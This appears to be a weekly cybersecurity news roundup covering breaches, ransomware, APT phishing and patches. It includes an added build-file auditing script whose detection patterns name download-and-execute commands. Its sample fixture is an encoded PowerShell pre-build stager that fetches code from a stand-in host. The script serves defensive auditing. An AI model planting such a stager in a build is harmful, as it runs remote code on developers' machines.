
This Week in Cybersecurity: Looking Back at Week 25

June 20, 2025 Reading Time: 6 minutes

This week’s roundup features a diverse range of threats, from the abuse of open-source hacking tools to innovative phishing tactics bypassing two-factor authentication.

A staggering 16 billion login credentials have been exposed in what researchers are calling one of the largest data breaches in history, raising serious concerns about credential hygiene and the widespread use of infostealer malware.

Ireland’s National Cyber Security Centre has issued a new warning on the growing threat of SMS pumping, while ransomware attacks continue to cause widespread disruption, with supply chain firm Chain IQ and NHS service provider Synnovis both falling victim—impacting data and delaying over 1,100 operations.

Meanwhile, advanced actors like BlueNoroff and APT29 are deploying deepfake lures and exploiting Gmail's legacy access settings to infiltrate systems, and critical vulnerabilities in widely used software like Veeam Backup & Replication are being patched under emergency advisories.

New Campaigns Embed Malware in Open-Source Hacking Tools

Security firms Trend Micro and ReversingLabs have uncovered coordinated campaigns that insert malware into open-source hacking tools distributed through GitHub repositories.

The first campaign, linked to a threat actor called "Water Curse," used at least 76 GitHub accounts to inject payloads into build scripts and project files. The payloads steal credentials, browser data and session tokens and grant the attacker remote access to the machine that built the tool.

A parallel campaign by "Banana Squad" used more than 67 GitHub repositories posing as Python-based hacking tools, each delivering a trojanised version of the tool it imitated.

These operations exploit the trust developers place in GitHub, targeting red teams, novice cybercriminals, and online communities. Users are urged to audit third-party repository code, including build scripts and project files that run before the tool itself does, and to validate tool authenticity before use.
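A practical shape for that audit, as an added example and not code from Trend Micro, ReversingLabs or the page's source: the script below walks a cloned repository, looks only at files that execute at build or install time (setup.py, Makefile, MSBuild project files; an assumed set), flags build events, encoded PowerShell switches and fetch-and-execute patterns, and decodes any -EncodedCommand argument so the reviewer sees what the hook would actually run. The indicator list and the trojanised sample checkout it writes to a temporary directory are constructed for the demonstration.

```python
"""Heuristic audit of a third-party tool checkout for code hidden in build files.

Added example; it is not code from Trend Micro, ReversingLabs or the page's source.
The indicator list, file set and sample checkout are constructed assumptions.
"""
from __future__ import annotations

import base64
import binascii
import re
import tempfile
from pathlib import Path

# Files where a hook runs at build/install time (assumed typical set for Python and .NET tools).
BUILD_FILES = {"setup.py", "Makefile", "build.bat", "build.ps1"}
BUILD_SUFFIXES = {".csproj", ".vcxproj", ".props", ".targets"}

# Base64 argument to PowerShell's -e / -enc / -EncodedCommand switch.
ENCODED_CMD = re.compile(r"(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{40,})")

# Constructed indicators; each regex is paired with the behaviour it suggests.
INDICATORS = [
    (ENCODED_CMD, "encoded PowerShell command"),
    (re.compile(r"(?i)<PreBuildEvent>|<PostBuildEvent>|<Exec\s"), "MSBuild build event or Exec task"),
    (re.compile(r"(?i)\b(exec|eval)\s*\(\s*(base64|b64decode|codecs|bytes\.fromhex)"), "exec of decoded blob"),
    (re.compile(r"(?i)\b(curl|wget|Invoke-WebRequest|iwr|urllib\.request|requests\.get)\b"), "network fetch at build time"),
    (re.compile(r"(?i)\b(DownloadString|DownloadFile|IEX|Invoke-Expression)\b"), "PowerShell download or eval"),
    (re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"), "long base64-like blob"),
]


def scan_text(text: str) -> list[str]:
    """Return the sorted labels of every indicator that matches the text."""
    return sorted({label for rx, label in INDICATORS if rx.search(text)})


def decode_encoded_command(blob: str) -> str | None:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE, as PowerShell expects)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")  # not UTF-16, but still worth a look


def extract_encoded_commands(text: str) -> list[str]:
    decoded = (decode_encoded_command(m.group(1)) for m in ENCODED_CMD.finditer(text))
    return [d for d in decoded if d]


def is_build_file(path: Path) -> bool:
    return path.name in BUILD_FILES or path.suffix.lower() in BUILD_SUFFIXES


def audit_checkout(root: Path) -> dict[str, dict]:
    """Scan every build file under root; return findings keyed by relative path."""
    findings: dict[str, dict] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or not is_build_file(path):
            continue
        text = path.read_text(errors="replace")
        labels = set(scan_text(text))
        decoded = extract_encoded_commands(text)
        for cmd in decoded:  # re-scan what the encoded command would actually do
            labels.update(f"in decoded command: {lbl}" for lbl in scan_text(cmd))
        if labels:
            findings[path.relative_to(root).as_posix()] = {"labels": sorted(labels), "decoded": decoded}
    return findings


def build_sample_checkout(root: Path) -> None:
    """Write a constructed checkout: a clean setup.py and a trojanised .csproj."""
    (root / "setup.py").write_text('from setuptools import setup\nsetup(name="recon-tool", version="1.0")\n')
    (root / "README.md").write_text("# recon-tool\n")
    # Harmless stand-in for a stager, pointed at a reserved .invalid domain.
    stager = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
    blob = base64.b64encode(stager.encode("utf-16-le")).decode()
    (root / "src").mkdir()
    (root / "src" / "Tool.csproj").write_text(
        "<Project>\n  <PropertyGroup>\n"
        f"    <PreBuildEvent>powershell -nop -w hidden -enc {blob}</PreBuildEvent>\n"
        "  </PropertyGroup>\n</Project>\n"
    )


def run_demo() -> dict[str, dict]:
    """Build the sample checkout in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_checkout(root)
        return audit_checkout(root)


if __name__ == "__main__":
    for rel, finding in run_demo().items():
        print(rel, finding["labels"])
        for cmd in finding["decoded"]:
            print("  decoded:", cmd)
```

Point audit_checkout at a real clone before building it; a hit is a lead to read by hand, not a verdict, and a clean result only means none of these particular patterns appeared.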


16 Billion Login Credentials Exposed in One of the Largest Data Breaches Ever Recorded

Cybernews researchers have uncovered 30 massive datasets totaling over 16 billion exposed login credentials, making this one of the largest credential leaks in history. The records, many harvested through infostealer malware, span platforms like Apple, Google, Facebook, GitHub, Telegram, and even government services.

Each dataset contains structured data including URLs, usernames, and passwords, and some also include tokens, cookies, and metadata. These fresh and structured logs present a critical threat, enabling cybercriminals to conduct account takeovers, phishing, ransomware attacks, and business email compromise.

Although the data was only briefly exposed via unsecured cloud storage, the sheer scale signals a growing global threat. Researchers stress that strong, unique passwords and multi-factor authentication are now more essential than ever.


NCSC Warns Businesses Against “SMS Pumping”

Ireland's National Cyber Security Centre (NCSC) has issued new guidance on preventing "SMS pumping" (artificially inflated traffic) attacks, in which fraudsters abuse public SMS and telephone interfaces, such as OTP forms and support numbers, to trigger large volumes of messages or calls that the targeted business pays for.

The NCSC emphasises that the technology underpinning mass SMS and voice services does not verify caller identity, making it easy to spoof legitimate organisations and exploit their systems.

To combat this, businesses should standardise Sender IDs, limit the number of channels and phone numbers in use, monitor traffic for spikes, set rate limits, and ensure telecom suppliers follow industry best practices. Adopting these measures helps prevent financial loss and reputational damage caused by telecom fraud.
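A concrete shape for the rate-limit and spike-monitoring advice, as an added example and not code from the NCSC guidance: a sliding-window guard placed in front of an OTP-sending endpoint that refuses destinations outside the countries the service serves, caps sends per destination number, per source IP and per country prefix, and exposes the per-prefix count for a monitor to alert on. The limits, prefix table and simulated attack traffic are assumptions made for the demonstration.

```python
"""Rate-limiting guard for an OTP-sending endpoint.

Added example; not code from the NCSC guidance or the page's source. Thresholds,
prefix tables and sample traffic are constructed assumptions.
"""
from __future__ import annotations

from collections import defaultdict, deque

# Countries this hypothetical service actually serves; anything else is refused outright.
ALLOWED_PREFIXES = frozenset({"+353", "+44"})
# Small constructed table for splitting an E.164 number into its country prefix.
KNOWN_PREFIXES = ("+353", "+44", "+1", "+7", "+234", "+380")


def country_prefix(number: str) -> str:
    for prefix in KNOWN_PREFIXES:
        if number.startswith(prefix):
            return prefix
    return number[:3]  # crude fallback for prefixes not in the table


class OtpSendGuard:
    """Sliding-window limits per destination number, per source IP and per country prefix.

    The per-prefix limit is what blunts pumping: an attacker rotating through many
    numbers and many source IPs still shares one country prefix.
    """

    def __init__(self, window_s: int = 600, per_number: int = 3,
                 per_source: int = 10, per_prefix: int = 20) -> None:
        self.window_s = window_s
        self.limits = {"number": per_number, "source": per_source, "prefix": per_prefix}
        self._events: dict[tuple[str, str], deque] = defaultdict(deque)

    def _recent(self, key: tuple[str, str], now: float) -> int:
        q = self._events[key]
        while q and q[0] <= now - self.window_s:  # drop sends outside the window
            q.popleft()
        return len(q)

    def check(self, dest: str, source_ip: str, now: float) -> str:
        """Return "allow" or "deny:<reason>"; only allowed sends are recorded."""
        prefix = country_prefix(dest)
        if prefix not in ALLOWED_PREFIXES:
            return "deny:prefix_not_served"
        keys = {"number": ("number", dest), "source": ("source", source_ip), "prefix": ("prefix", prefix)}
        for name, key in keys.items():
            if self._recent(key, now) >= self.limits[name]:
                return f"deny:{name}_limit"
        for key in keys.values():
            self._events[key].append(now)
        return "allow"

    def sends_to_prefix(self, prefix: str, now: float) -> int:
        """Window count for one prefix: the figure a traffic monitor would alert on."""
        return self._recent(("prefix", prefix), now)


def simulate_pumping(guard: OtpSendGuard, n: int, start: float = 1000.0,
                     source_ip: str | None = None) -> int:
    """Request OTPs for n distinct constructed UK numbers; return how many were allowed."""
    allowed = 0
    for i in range(n):
        dest = f"+447700900{i:03d}"
        ip = source_ip or f"203.0.113.{i % 250 + 1}"  # rotating or fixed source address
        if guard.check(dest, ip, start + i) == "allow":
            allowed += 1
    return allowed


if __name__ == "__main__":
    g = OtpSendGuard()
    print("rotating IPs:", simulate_pumping(g, 30), "of 30 allowed")
    print("sends to +44 in window:", g.sends_to_prefix("+44", 1030))
```

Per-IP limits alone are easy to sidestep with a proxy pool, which is why the per-prefix cap and the allow-list carry the weight here; in production the per-prefix figure would also be compared against a baseline and pushed to an alert rather than only printed.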


Chain IQ Supplier Hit in Ransomware Attack

On June 12, 2025, Swiss procurement provider Chain IQ and 19 associated firms were struck by a ransomware attack linked to the WorldLeaks group, resulting in the theft of data from Chain IQ customers.

Chain IQ responded within 8 hours and 45 minutes, revoking attacker access and containing the incident, though the ransomware group claimed approximately 910 GB of stolen data—about 1.9 million files.

The breach affected employee contact details of major clients including UBS, Pictet, Manor, and Implenia; however, UBS confirmed there was no compromise of customer data.


NHS Blood Test Provider Synnovis Hit by Ransomware

On June 3, 2024, ransomware attackers breached Synnovis, a major NHS blood testing provider serving southeast London, stealing approximately 400 GB of data.

The breach exposed highly sensitive patient information, including names, dates of birth, NHS numbers, and blood test details, alongside contractual and financial documents.

More than 1,100 planned operations and 2,100 outpatient appointments were delayed, and some blood tests had to be repeated due to sample spoilage. NHS England, in coordination with Synnovis, the National Cyber Security Centre, and the National Crime Agency, is investigating the breach. A helpline has been established for impacted patients.

Health officials say urgent and emergency services remain operational, though delays in routine care persist. Affected individuals are being informed and advised to monitor their records for suspicious activity.


BlueNoroff Uses Deepfake Zoom Call to Infect Mac with macOS Backdoor Malware

The North Korea-linked APT group BlueNoroff recently executed a sophisticated attack targeting a cryptocurrency company employee using a deepfake Zoom session.

Researchers from Huntress reported that the attackers initiated contact via Telegram, sent a Calendly link that redirected victims to a fake Zoom domain, and conducted a meeting featuring AI-generated falsified company executives.

During the call, the fake executives urged the victim to install a "Zoom support extension", which turned out to be macOS malware. The malicious AppleScript, named zoom_sdk_support.scpt, downloaded a shell script that deployed the backdoor payload.


Veeam Releases Emergency Patches for Critical RCE Vulnerability in Backup and Replication

Veeam has issued an emergency update (v12.3.2, build 12.3.2.3617) to fix CVE-2025-23121, a critical remote code execution flaw (CVSS 9.9) in its Backup & Replication software that allows any authenticated domain user to execute arbitrary code on the backup server.

The vulnerability affects all earlier v12 builds. The same release also addresses two further issues: one allowing backup operators to modify jobs (CVE-2025-24286) and another enabling privilege escalation on Windows agents (CVE-2025-24287). Discovered by CODE WHITE GmbH and watchTowr, these flaws are particularly dangerous where the backup server is domain-joined, because any domain account can then reach the vulnerable code.

With Veeam being a frequent target for ransomware gangs, administrators are urged to update immediately to prevent catastrophic backup compromises.


Russian APT29 Exploits Gmail App‑Specific Passwords to Bypass 2FA in Targeted Phishing Campaign

From April to early June 2025, the Russian-linked APT29 (tracked as UNC6293) ran a highly targeted phishing campaign against prominent academics and critics of Russia, impersonating US State Department staff.

Through weeks of rapport-building and tailored emails, the attackers convinced victims to generate and share Google app-specific passwords, a feature intended for legacy applications that cannot use modern sign-in, thereby bypassing two-factor authentication. Once a password was handed over, the attackers gained persistent access to the victim's Gmail account without triggering a login challenge. The campaign is notable for its sophistication, patience, and use of official-seeming communications from multiple addresses.

The Citizen Lab and Google Threat Intelligence Group emphasise that this approach represents a novel social-engineering tactic rather than a technical exploit. High-risk users are urged to enable Google’s Advanced Protection Program and scrutinise all app passwords.
